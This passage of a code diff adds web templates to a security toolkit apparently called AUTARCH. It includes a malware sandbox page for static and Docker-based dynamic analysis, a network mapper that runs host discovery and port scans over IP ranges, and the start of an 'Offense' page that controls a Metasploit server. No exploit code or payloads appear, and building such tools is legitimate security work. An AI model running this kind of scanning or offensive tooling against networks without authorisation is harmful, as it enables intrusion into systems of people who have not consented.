|
||||
<button class="btn btn-small" onclick="sandboxLoadSamples()">Refresh</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Name</th><th>Size</th><th>SHA256</th><th>Submitted</th><th>Status</th></tr></thead>
|
||||
<tbody id="sandbox-samples-table">
|
||||
<tr><td colspan="5" class="empty-state">No samples submitted yet.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== ANALYZE TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="sandbox" data-tab="analyze">
|
||||
|
||||
<div class="section">
|
||||
<h2>Select Sample</h2>
|
||||
<div class="input-row">
|
||||
<select id="sandbox-sample-select" style="flex:2">
|
||||
<option value="">-- Select a sample --</option>
|
||||
</select>
|
||||
<button class="btn btn-small" onclick="sandboxRefreshSelect()">Refresh List</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Static Analysis</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Inspect file headers, strings, imports, and calculate risk score without execution.
|
||||
</p>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-static" class="btn btn-primary" onclick="sandboxStatic()">Run Static Analysis</button>
|
||||
</div>
|
||||
|
||||
<!-- Risk Score Gauge -->
|
||||
<div id="sandbox-static-results" style="display:none">
|
||||
<div style="display:flex;gap:24px;align-items:flex-start;flex-wrap:wrap;margin-bottom:16px">
|
||||
<div class="score-display">
|
||||
<div class="score-value" id="sandbox-risk-score">--</div>
|
||||
<div class="score-label">Risk Score</div>
|
||||
</div>
|
||||
<div style="flex:1;min-width:250px">
|
||||
<table class="data-table" style="font-size:0.85rem">
|
||||
<tbody>
|
||||
<tr><td>File Type</td><td id="sandbox-file-type">--</td></tr>
|
||||
<tr><td>File Size</td><td id="sandbox-file-size">--</td></tr>
|
||||
<tr><td>MD5</td><td id="sandbox-md5" style="font-family:monospace;font-size:0.8rem">--</td></tr>
|
||||
<tr><td>SHA256</td><td id="sandbox-sha256" style="font-family:monospace;font-size:0.8rem;word-break:break-all">--</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<h3>Indicators by Category</h3>
|
||||
<div id="sandbox-indicators" style="margin-bottom:16px"></div>
|
||||
|
||||
<h3>Interesting Strings</h3>
|
||||
<pre class="output-panel scrollable" id="sandbox-strings" style="max-height:200px"></pre>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Dynamic Analysis</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Execute sample in an isolated Docker container and monitor behavior.
|
||||
</p>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-dynamic" class="btn btn-danger" onclick="sandboxDynamic()">Run Dynamic Analysis</button>
|
||||
<span id="sandbox-dynamic-status" style="font-size:0.8rem;color:var(--text-muted);margin-left:12px"></span>
|
||||
</div>
|
||||
|
||||
<div id="sandbox-dynamic-results" style="display:none">
|
||||
<h3>Syscalls</h3>
|
||||
<pre class="output-panel scrollable" id="sandbox-syscalls" style="max-height:200px"></pre>
|
||||
|
||||
<h3 style="margin-top:12px">Files Accessed</h3>
|
||||
<pre class="output-panel scrollable" id="sandbox-files" style="max-height:200px"></pre>
|
||||
|
||||
<h3 style="margin-top:12px">Network Calls</h3>
|
||||
<pre class="output-panel scrollable" id="sandbox-network" style="max-height:200px"></pre>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== REPORTS TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="sandbox" data-tab="reports">
|
||||
|
||||
<div class="section">
|
||||
<h2>Analysis Reports</h2>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button class="btn btn-small" onclick="sandboxLoadReports()">Refresh</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Sample</th><th>Risk Level</th><th>Date</th><th>Action</th></tr></thead>
|
||||
<tbody id="sandbox-reports-table">
|
||||
<tr><td colspan="4" class="empty-state">No reports generated yet.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Generate Report</h2>
|
||||
<div class="input-row">
|
||||
<select id="sandbox-report-sample" style="flex:2">
|
||||
<option value="">-- Select a sample --</option>
|
||||
</select>
|
||||
<button id="btn-gen-report" class="btn btn-primary" onclick="sandboxGenReport()">Generate Report</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="section" id="sandbox-report-viewer" style="display:none">
|
||||
<h2>Report</h2>
|
||||
<div id="sandbox-report-content"></div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<script>
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
var _dynamicPoll = null;
|
||||
|
||||
/* ── Submit ── */
|
||||
function sandboxSubmit() {
|
||||
var btn = document.getElementById('btn-sandbox-submit');
|
||||
var fileInput = document.getElementById('sandbox-upload-file');
|
||||
var pathInput = document.getElementById('sandbox-file-path').value.trim();
|
||||
|
||||
if (fileInput.files.length > 0) {
|
||||
setLoading(btn, true);
|
||||
var fd = new FormData();
|
||||
fd.append('file', fileInput.files[0]);
|
||||
fetch('/sandbox/submit', {method: 'POST', body: fd}).then(function(r) { return r.json(); }).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('sandbox-submit-output', data.message || data.error || 'Submitted');
|
||||
if (data.success) { sandboxLoadSamples(); sandboxRefreshSelect(); }
|
||||
}).catch(function() { setLoading(btn, false); renderOutput('sandbox-submit-output', 'Upload failed'); });
|
||||
} else if (pathInput) {
|
||||
setLoading(btn, true);
|
||||
postJSON('/sandbox/submit', {path: pathInput}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('sandbox-submit-output', data.message || data.error || 'Submitted');
|
||||
if (data.success) { sandboxLoadSamples(); sandboxRefreshSelect(); }
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
} else {
|
||||
renderOutput('sandbox-submit-output', 'Select a file or enter a path.');
|
||||
}
|
||||
}
|
||||
|
||||
function sandboxLoadSamples() {
|
||||
fetchJSON('/sandbox/samples').then(function(data) {
|
||||
var tb = document.getElementById('sandbox-samples-table');
|
||||
var samples = data.samples || [];
|
||||
if (!samples.length) {
|
||||
tb.innerHTML = '<tr><td colspan="5" class="empty-state">No samples submitted yet.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
samples.forEach(function(s) {
|
||||
var statusBadge = s.status === 'analyzed' ? '<span class="badge badge-pass">Analyzed</span>'
|
||||
: s.status === 'pending' ? '<span class="badge badge-medium">Pending</span>'
|
||||
: '<span class="badge badge-info">' + esc(s.status) + '</span>';
|
||||
html += '<tr><td>' + esc(s.name) + '</td><td>' + esc(s.size) + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.75rem;word-break:break-all">' + esc(s.sha256 || '--') + '</td>'
|
||||
+ '<td>' + esc(s.date) + '</td><td>' + statusBadge + '</td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function sandboxRefreshSelect() {
|
||||
fetchJSON('/sandbox/samples').then(function(data) {
|
||||
var samples = data.samples || [];
|
||||
var opts = '<option value="">-- Select a sample --</option>';
|
||||
samples.forEach(function(s) {
|
||||
opts += '<option value="' + esc(s.id || s.sha256) + '">' + esc(s.name) + ' (' + esc(s.size) + ')</option>';
|
||||
});
|
||||
document.getElementById('sandbox-sample-select').innerHTML = opts;
|
||||
document.getElementById('sandbox-report-sample').innerHTML = opts;
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Static Analysis ── */
|
||||
function sandboxStatic() {
|
||||
var sampleId = document.getElementById('sandbox-sample-select').value;
|
||||
if (!sampleId) { alert('Select a sample first.'); return; }
|
||||
var btn = document.getElementById('btn-static');
|
||||
setLoading(btn, true);
|
||||
document.getElementById('sandbox-static-results').style.display = 'none';
|
||||
|
||||
postJSON('/sandbox/analyze/static', {sample_id: sampleId}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
document.getElementById('sandbox-static-results').style.display = 'block';
|
||||
|
||||
var score = data.risk_score || 0;
|
||||
var scoreEl = document.getElementById('sandbox-risk-score');
|
||||
scoreEl.textContent = score + '/100';
|
||||
scoreEl.style.color = score >= 70 ? 'var(--danger)' : score >= 40 ? 'var(--warning)' : 'var(--success)';
|
||||
|
||||
document.getElementById('sandbox-file-type').textContent = data.file_type || '--';
|
||||
document.getElementById('sandbox-file-size').textContent = data.file_size || '--';
|
||||
document.getElementById('sandbox-md5').textContent = data.md5 || '--';
|
||||
document.getElementById('sandbox-sha256').textContent = data.sha256 || '--';
|
||||
|
||||
var indHtml = '';
|
||||
var indicators = data.indicators || {};
|
||||
Object.keys(indicators).forEach(function(cat) {
|
||||
indHtml += '<div style="margin-bottom:8px"><strong style="color:var(--text-secondary);font-size:0.85rem">' + esc(cat) + '</strong><ul style="margin:4px 0 0 16px;font-size:0.85rem">';
|
||||
(indicators[cat] || []).forEach(function(item) {
|
||||
indHtml += '<li>' + esc(item) + '</li>';
|
||||
});
|
||||
indHtml += '</ul></div>';
|
||||
});
|
||||
document.getElementById('sandbox-indicators').innerHTML = indHtml || '<span class="empty-state">No indicators found.</span>';
|
||||
|
||||
var strings = (data.strings || []).join('\n');
|
||||
renderOutput('sandbox-strings', strings || 'No interesting strings found.');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
/* ── Dynamic Analysis ── */
|
||||
function sandboxDynamic() {
|
||||
var sampleId = document.getElementById('sandbox-sample-select').value;
|
||||
if (!sampleId) { alert('Select a sample first.'); return; }
|
||||
var btn = document.getElementById('btn-dynamic');
|
||||
setLoading(btn, true);
|
||||
document.getElementById('sandbox-dynamic-status').textContent = 'Submitting for dynamic analysis...';
|
||||
document.getElementById('sandbox-dynamic-results').style.display = 'none';
|
||||
|
||||
postJSON('/sandbox/analyze/dynamic', {sample_id: sampleId}).then(function(data) {
|
||||
if (data.error) {
|
||||
setLoading(btn, false);
|
||||
document.getElementById('sandbox-dynamic-status').textContent = 'Error: ' + data.error;
|
||||
return;
|
||||
}
|
||||
if (data.job_id) {
|
||||
document.getElementById('sandbox-dynamic-status').textContent = 'Running in Docker sandbox...';
|
||||
sandboxPollDynamic(data.job_id);
|
||||
} else {
|
||||
setLoading(btn, false);
|
||||
sandboxRenderDynamic(data);
|
||||
}
|
||||
}).catch(function() {
|
||||
setLoading(btn, false);
|
||||
document.getElementById('sandbox-dynamic-status').textContent = 'Request failed';
|
||||
});
|
||||
}
|
||||
|
||||
function sandboxPollDynamic(jobId) {
|
||||
if (_dynamicPoll) clearInterval(_dynamicPoll);
|
||||
_dynamicPoll = setInterval(function() {
|
||||
fetchJSON('/sandbox/analyze/dynamic/status/' + jobId).then(function(data) {
|
||||
if (data.status === 'running') {
|
||||
document.getElementById('sandbox-dynamic-status').textContent = 'Running... (' + (data.elapsed || '0') + 's)';
|
||||
} else {
|
||||
clearInterval(_dynamicPoll);
|
||||
_dynamicPoll = null;
|
||||
setLoading(document.getElementById('btn-dynamic'), false);
|
||||
if (data.status === 'complete') {
|
||||
document.getElementById('sandbox-dynamic-status').textContent = 'Analysis complete';
|
||||
sandboxRenderDynamic(data);
|
||||
} else {
|
||||
document.getElementById('sandbox-dynamic-status').textContent = 'Failed: ' + (data.error || 'unknown');
|
||||
}
|
||||
}
|
||||
}).catch(function() {
|
||||
clearInterval(_dynamicPoll);
|
||||
_dynamicPoll = null;
|
||||
setLoading(document.getElementById('btn-dynamic'), false);
|
||||
document.getElementById('sandbox-dynamic-status').textContent = 'Poll error';
|
||||
});
|
||||
}, 3000);
|
||||
}
|
||||
|
||||
function sandboxRenderDynamic(data) {
|
||||
document.getElementById('sandbox-dynamic-results').style.display = 'block';
|
||||
renderOutput('sandbox-syscalls', (data.syscalls || []).join('\n') || 'No syscalls captured.');
|
||||
renderOutput('sandbox-files', (data.files_accessed || []).join('\n') || 'No file access recorded.');
|
||||
renderOutput('sandbox-network', (data.network_calls || []).join('\n') || 'No network activity recorded.');
|
||||
}
|
||||
|
||||
/* ── Reports ── */
|
||||
function sandboxLoadReports() {
|
||||
fetchJSON('/sandbox/reports').then(function(data) {
|
||||
var tb = document.getElementById('sandbox-reports-table');
|
||||
var reports = data.reports || [];
|
||||
if (!reports.length) {
|
||||
tb.innerHTML = '<tr><td colspan="4" class="empty-state">No reports generated yet.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
reports.forEach(function(r) {
|
||||
var lvl = (r.risk_level || 'unknown').toLowerCase();
|
||||
var badgeClass = lvl === 'critical' || lvl === 'high' ? 'badge-fail'
|
||||
: lvl === 'medium' ? 'badge-medium'
|
||||
: lvl === 'low' ? 'badge-low' : 'badge-info';
|
||||
html += '<tr><td>' + esc(r.sample_name) + '</td>'
|
||||
+ '<td><span class="badge ' + badgeClass + '">' + esc(r.risk_level) + '</span></td>'
|
||||
+ '<td>' + esc(r.date) + '</td>'
|
||||
+ '<td><button class="btn btn-small" onclick="sandboxViewReport(\'' + esc(r.id) + '\')">View</button></td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function sandboxGenReport() {
|
||||
var sampleId = document.getElementById('sandbox-report-sample').value;
|
||||
if (!sampleId) { alert('Select a sample first.'); return; }
|
||||
var btn = document.getElementById('btn-gen-report');
|
||||
setLoading(btn, true);
|
||||
postJSON('/sandbox/reports/generate', {sample_id: sampleId}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
sandboxLoadReports();
|
||||
if (data.report_id) sandboxViewReport(data.report_id);
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function sandboxViewReport(reportId) {
|
||||
fetchJSON('/sandbox/reports/' + reportId).then(function(data) {
|
||||
if (data.error) { alert('Error: ' + data.error); return; }
|
||||
document.getElementById('sandbox-report-viewer').style.display = 'block';
|
||||
var html = '<div style="background:var(--bg-card);border:1px solid var(--border);border-radius:var(--radius);padding:16px">';
|
||||
|
||||
var lvl = (data.risk_level || 'unknown').toLowerCase();
|
||||
var badgeClass = lvl === 'critical' || lvl === 'high' ? 'badge-fail'
|
||||
: lvl === 'medium' ? 'badge-medium'
|
||||
: lvl === 'low' ? 'badge-low' : 'badge-info';
|
||||
html += '<div style="display:flex;justify-content:space-between;align-items:center;margin-bottom:12px">'
|
||||
+ '<strong>' + esc(data.sample_name || 'Unknown') + '</strong>'
|
||||
+ '<span class="badge ' + badgeClass + '">' + esc(data.risk_level || 'N/A') + '</span></div>';
|
||||
|
||||
html += '<table class="data-table" style="font-size:0.85rem;margin-bottom:12px"><tbody>';
|
||||
html += '<tr><td>Risk Score</td><td>' + (data.risk_score || '--') + '/100</td></tr>';
|
||||
html += '<tr><td>File Type</td><td>' + esc(data.file_type || '--') + '</td></tr>';
|
||||
html += '<tr><td>SHA256</td><td style="font-family:monospace;font-size:0.8rem;word-break:break-all">' + esc(data.sha256 || '--') + '</td></tr>';
|
||||
html += '<tr><td>Date</td><td>' + esc(data.date || '--') + '</td></tr>';
|
||||
html += '</tbody></table>';
|
||||
|
||||
if (data.summary) {
|
||||
html += '<h4 style="margin-bottom:6px;font-size:0.85rem;color:var(--text-secondary)">Summary</h4>';
|
||||
html += '<p style="font-size:0.85rem;margin-bottom:12px">' + esc(data.summary) + '</p>';
|
||||
}
|
||||
|
||||
html += '</div>';
|
||||
document.getElementById('sandbox-report-content').innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Init ── */
|
||||
document.addEventListener('DOMContentLoaded', function() {
|
||||
sandboxLoadSamples();
|
||||
sandboxRefreshSelect();
|
||||
sandboxLoadReports();
|
||||
});
|
||||
</script>
|
||||
{% endblock %}
|
||||
264
web/templates/net_mapper.html
Normal file
264
web/templates/net_mapper.html
Normal file
@ -0,0 +1,264 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}Net Mapper — AUTARCH{% endblock %}
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Network Topology Mapper</h1>
|
||||
<p class="text-muted">Host discovery, service enumeration, topology visualization</p>
|
||||
</div>
|
||||
|
||||
<div class="tabs">
|
||||
<button class="tab active" onclick="switchTab('discover')">Discover</button>
|
||||
<button class="tab" onclick="switchTab('map')">Map</button>
|
||||
<button class="tab" onclick="switchTab('scans')">Saved Scans</button>
|
||||
</div>
|
||||
|
||||
<!-- Discover -->
|
||||
<div id="tab-discover" class="tab-content active">
|
||||
<div class="card" style="max-width:700px">
|
||||
<h3>Host Discovery</h3>
|
||||
<div style="display:flex;gap:0.5rem;align-items:end">
|
||||
<div class="form-group" style="flex:1;margin:0">
|
||||
<label>Target (CIDR, range, or single IP)</label>
|
||||
<input type="text" id="disc-target" class="form-control" placeholder="192.168.1.0/24">
|
||||
</div>
|
||||
<select id="disc-method" class="form-control" style="width:130px">
|
||||
<option value="auto">Auto</option>
|
||||
<option value="nmap">Nmap</option>
|
||||
<option value="icmp">ICMP/TCP</option>
|
||||
</select>
|
||||
<button class="btn btn-primary" id="disc-btn" onclick="startDiscover()">Scan</button>
|
||||
</div>
|
||||
<div id="disc-status" style="margin-top:0.5rem"></div>
|
||||
</div>
|
||||
|
||||
<div id="disc-results" style="margin-top:1rem">
|
||||
<div id="disc-empty" class="card" style="text-align:center;color:var(--text-muted)">Run a discovery scan to find hosts</div>
|
||||
<div id="disc-hosts" style="display:none">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center;margin-bottom:0.5rem">
|
||||
<h3>Discovered Hosts (<span id="host-count">0</span>)</h3>
|
||||
<div style="display:flex;gap:0.5rem">
|
||||
<button class="btn btn-sm" onclick="showTopology()">View Map</button>
|
||||
<button class="btn btn-sm" onclick="saveScan()">Save Scan</button>
|
||||
</div>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>IP</th><th>Hostname</th><th>MAC</th><th>OS</th><th>Ports</th><th>Action</th></tr></thead>
|
||||
<tbody id="hosts-body"></tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Map -->
|
||||
<div id="tab-map" class="tab-content" style="display:none">
|
||||
<div class="card">
|
||||
<h3>Network Topology</h3>
|
||||
<div id="topology-canvas" style="width:100%;height:500px;background:#0a0a12;border-radius:var(--radius);position:relative;overflow:hidden">
|
||||
<svg id="topo-svg" width="100%" height="100%"></svg>
|
||||
</div>
|
||||
<div id="topo-info" style="margin-top:0.5rem;font-size:0.8rem;color:var(--text-muted)"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Saved Scans -->
|
||||
<div id="tab-scans" class="tab-content" style="display:none">
|
||||
<h3>Saved Scans</h3>
|
||||
<div id="scans-list"></div>
|
||||
<div class="card" style="margin-top:1rem">
|
||||
<h4>Compare Scans</h4>
|
||||
<div style="display:flex;gap:0.5rem;align-items:end">
|
||||
<select id="diff-s1" class="form-control" style="flex:1"></select>
|
||||
<span>vs</span>
|
||||
<select id="diff-s2" class="form-control" style="flex:1"></select>
|
||||
<button class="btn btn-primary" onclick="diffScans()">Compare</button>
|
||||
</div>
|
||||
<div id="diff-results" style="margin-top:0.5rem"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<style>
|
||||
.node-circle{cursor:pointer;transition:r 0.2s}
|
||||
.node-circle:hover{r:12}
|
||||
.spinner-inline{display:inline-block;width:14px;height:14px;border:2px solid var(--border);border-top-color:var(--accent);border-radius:50%;animation:spin 0.8s linear infinite;vertical-align:middle;margin-right:6px}
|
||||
@keyframes spin{to{transform:rotate(360deg)}}
|
||||
</style>
|
||||
|
||||
<script>
|
||||
let currentHosts=[];
|
||||
let discPoll=null;
|
||||
|
||||
function switchTab(name){
|
||||
document.querySelectorAll('.tab').forEach((t,i)=>t.classList.toggle('active',['discover','map','scans'][i]===name));
|
||||
document.querySelectorAll('.tab-content').forEach(c=>c.style.display='none');
|
||||
document.getElementById('tab-'+name).style.display='';
|
||||
if(name==='scans') loadScans();
|
||||
}
|
||||
|
||||
function startDiscover(){
|
||||
const target=document.getElementById('disc-target').value.trim();
|
||||
if(!target) return;
|
||||
document.getElementById('disc-btn').disabled=true;
|
||||
document.getElementById('disc-status').innerHTML='<div class="spinner-inline"></div> Discovering hosts...';
|
||||
fetch('/net-mapper/discover',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({target,method:document.getElementById('disc-method').value})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){showDiscError(d.error);return}
|
||||
if(discPoll) clearInterval(discPoll);
|
||||
discPoll=setInterval(()=>{
|
||||
fetch('/net-mapper/discover/'+d.job_id).then(r=>r.json()).then(s=>{
|
||||
if(!s.done) return;
|
||||
clearInterval(discPoll);discPoll=null;
|
||||
document.getElementById('disc-btn').disabled=false;
|
||||
document.getElementById('disc-status').innerHTML='';
|
||||
currentHosts=s.hosts||[];
|
||||
renderHosts(currentHosts);
|
||||
});
|
||||
},2000);
|
||||
}).catch(e=>showDiscError(e.message));
|
||||
}
|
||||
|
||||
function showDiscError(msg){
|
||||
document.getElementById('disc-btn').disabled=false;
|
||||
document.getElementById('disc-status').innerHTML='<span style="color:var(--danger)">'+esc(msg)+'</span>';
|
||||
}
|
||||
|
||||
function renderHosts(hosts){
|
||||
document.getElementById('disc-empty').style.display='none';
|
||||
document.getElementById('disc-hosts').style.display='';
|
||||
document.getElementById('host-count').textContent=hosts.length;
|
||||
const body=document.getElementById('hosts-body');
|
||||
body.innerHTML=hosts.map(h=>`<tr>
|
||||
<td><strong>${esc(h.ip)}</strong></td>
|
||||
<td>${esc(h.hostname||'—')}</td>
|
||||
<td style="font-size:0.8rem">${esc(h.mac||'—')}</td>
|
||||
<td style="font-size:0.8rem">${esc(h.os_guess||'—')}</td>
|
||||
<td>${(h.ports||[]).length}</td>
|
||||
<td><button class="btn btn-sm" onclick="scanHost('${h.ip}')">Detail Scan</button></td>
|
||||
</tr>`).join('');
|
||||
}
|
||||
|
||||
function scanHost(ip){
|
||||
fetch('/net-mapper/scan-host',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({ip})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){alert(d.error);return}
|
||||
const h=d.host;
|
||||
let msg=`${h.ip} — ${h.os_guess||'unknown OS'}\n\nOpen Ports:\n`;
|
||||
(h.ports||[]).forEach(p=>{msg+=` ${p.port}/${p.protocol} ${p.service||''} ${p.version||''}\n`});
|
||||
alert(msg);
|
||||
// Update in current hosts
|
||||
const idx=currentHosts.findIndex(x=>x.ip===ip);
|
||||
if(idx>=0) currentHosts[idx]=h;
|
||||
});
|
||||
}
|
||||
|
||||
function showTopology(){
|
||||
if(!currentHosts.length) return;
|
||||
fetch('/net-mapper/topology',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({hosts:currentHosts})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok) return;
|
||||
renderTopology(d);
|
||||
switchTab('map');
|
||||
});
|
||||
}
|
||||
|
||||
function renderTopology(data){
|
||||
const svg=document.getElementById('topo-svg');
|
||||
const w=svg.clientWidth||800,h=svg.clientHeight||500;
|
||||
svg.innerHTML='';
|
||||
const nodes=data.nodes.filter(n=>n.type!=='subnet');
|
||||
const colors={host:'#6366f1',web:'#22c55e',server:'#f59e0b',windows:'#3b82f6',subnet:'#444'};
|
||||
|
||||
// Simple force-directed-ish layout
|
||||
nodes.forEach((n,i)=>{
|
||||
const angle=(i/nodes.length)*Math.PI*2;
|
||||
const radius=Math.min(w,h)*0.35;
|
||||
n.x=w/2+Math.cos(angle)*radius;
|
||||
n.y=h/2+Math.sin(angle)*radius;
|
||||
});
|
||||
|
||||
// Edges
|
||||
data.edges.forEach(e=>{
|
||||
const from=nodes.find(n=>n.id===e.from);
|
||||
const to=nodes.find(n=>n.id===e.to);
|
||||
if(from&&to){
|
||||
const line=document.createElementNS('http://www.w3.org/2000/svg','line');
|
||||
line.setAttribute('x1',from.x);line.setAttribute('y1',from.y);
|
||||
line.setAttribute('x2',to.x);line.setAttribute('y2',to.y);
|
||||
line.setAttribute('stroke','#333');line.setAttribute('stroke-width','1');
|
||||
svg.appendChild(line);
|
||||
}
|
||||
});
|
||||
|
||||
// Nodes
|
||||
nodes.forEach(n=>{
|
||||
const g=document.createElementNS('http://www.w3.org/2000/svg','g');
|
||||
const circle=document.createElementNS('http://www.w3.org/2000/svg','circle');
|
||||
circle.setAttribute('cx',n.x);circle.setAttribute('cy',n.y);
|
||||
circle.setAttribute('r','8');circle.setAttribute('fill',colors[n.type]||'#6366f1');
|
||||
circle.classList.add('node-circle');
|
||||
const text=document.createElementNS('http://www.w3.org/2000/svg','text');
|
||||
text.setAttribute('x',n.x);text.setAttribute('y',n.y+20);
|
||||
text.setAttribute('text-anchor','middle');text.setAttribute('fill','#888');
|
||||
text.setAttribute('font-size','10');text.textContent=n.label||n.ip;
|
||||
g.appendChild(circle);g.appendChild(text);svg.appendChild(g);
|
||||
});
|
||||
|
||||
document.getElementById('topo-info').textContent=`${nodes.length} hosts across ${data.subnets.length} subnet(s)`;
|
||||
}
|
||||
|
||||
function saveScan(){
|
||||
if(!currentHosts.length) return;
|
||||
const name=prompt('Scan name:');
|
||||
if(!name) return;
|
||||
fetch('/net-mapper/scans',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({name,hosts:currentHosts})})
|
||||
.then(r=>r.json()).then(d=>{if(d.ok) alert('Scan saved')});
|
||||
}
|
||||
|
||||
function loadScans(){
|
||||
fetch('/net-mapper/scans').then(r=>r.json()).then(d=>{
|
||||
const scans=d.scans||[];
|
||||
const list=document.getElementById('scans-list');
|
||||
const s1=document.getElementById('diff-s1'),s2=document.getElementById('diff-s2');
|
||||
s1.innerHTML='';s2.innerHTML='';
|
||||
if(!scans.length){list.innerHTML='<div class="card" style="color:var(--text-muted)">No saved scans</div>';return}
|
||||
list.innerHTML=scans.map(s=>`<div class="card" style="margin-bottom:0.5rem;cursor:pointer" onclick="loadSavedScan('${esc(s.file)}')">
|
||||
<div style="display:flex;justify-content:space-between"><div><strong>${esc(s.name)}</strong> — ${s.host_count} hosts</div>
|
||||
<span style="font-size:0.8rem;color:var(--text-muted)">${(s.timestamp||'').slice(0,19)}</span></div></div>`).join('');
|
||||
scans.forEach(s=>{
|
||||
s1.innerHTML+=`<option value="${esc(s.file)}">${esc(s.name)} (${s.host_count})</option>`;
|
||||
s2.innerHTML+=`<option value="${esc(s.file)}">${esc(s.name)} (${s.host_count})</option>`;
|
||||
});
|
||||
});
|
||||
}
|
||||
|
||||
function loadSavedScan(file){
|
||||
fetch('/net-mapper/scans/'+encodeURIComponent(file)).then(r=>r.json()).then(d=>{
|
||||
if(!d.ok) return;
|
||||
currentHosts=d.scan.hosts||[];
|
||||
renderHosts(currentHosts);
|
||||
switchTab('discover');
|
||||
});
|
||||
}
|
||||
|
||||
function diffScans(){
|
||||
const s1=document.getElementById('diff-s1').value;
|
||||
const s2=document.getElementById('diff-s2').value;
|
||||
if(!s1||!s2) return;
|
||||
fetch('/net-mapper/diff',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({scan1:s1,scan2:s2})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){document.getElementById('diff-results').innerHTML=esc(d.error);return}
|
||||
let html=`<div style="margin-top:0.5rem;font-size:0.85rem">`;
|
||||
html+=`<div style="color:#22c55e"><strong>+ New hosts (${d.new_hosts.length}):</strong> ${d.new_hosts.join(', ')||'none'}</div>`;
|
||||
html+=`<div style="color:var(--danger)"><strong>- Removed (${d.removed_hosts.length}):</strong> ${d.removed_hosts.join(', ')||'none'}</div>`;
|
||||
html+=`<div style="color:var(--text-muted)">Unchanged: ${d.unchanged_hosts.length}</div></div>`;
|
||||
document.getElementById('diff-results').innerHTML=html;
|
||||
});
|
||||
}
|
||||
|
||||
function esc(s){return s?String(s).replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"'):''}
|
||||
</script>
|
||||
{% endblock %}
|
||||
@ -6,14 +6,52 @@
|
||||
<h1>Offense</h1>
|
||||
</div>
|
||||
|
||||
<!-- MSF Status -->
|
||||
<!-- MSF Server Control -->
|
||||
<div class="section">
|
||||
<h2>Metasploit Status</h2>
|
||||
<div class="status-indicator" id="msf-status">
|
||||
<span class="status-dot inactive"></span>Checking...
|
||||
<h2>Metasploit Server</h2>
|
||||
<div style="display:flex;align-items:center;gap:1rem;flex-wrap:wrap">
|
||||
<div class="status-indicator" id="msf-status">
|
||||
<span class="status-dot inactive"></span>Checking...
|
||||
</div>
|
||||
<div id="msf-version" style="font-size:0.8rem;color:var(--text-muted)"></div>
|
||||
<div style="flex:1"></div>
|
||||
<button id="btn-connect" class="btn btn-primary btn-small" onclick="msfConnect()" style="display:none">Connect</button>
|
||||
<button id="btn-disconnect" class="btn btn-small" onclick="msfDisconnect()" style="display:none">Disconnect</button>
|
||||
<button id="btn-start-server" class="btn btn-small" onclick="toggleServerPanel()" style="display:none">Start Server</button>
|
||||
<button id="btn-stop-server" class="btn btn-danger btn-small" onclick="msfStopServer()" style="display:none">Stop Server</button>
|
||||
</div>
|
||||
|
||||
<!-- Server config panel (hidden by default) -->
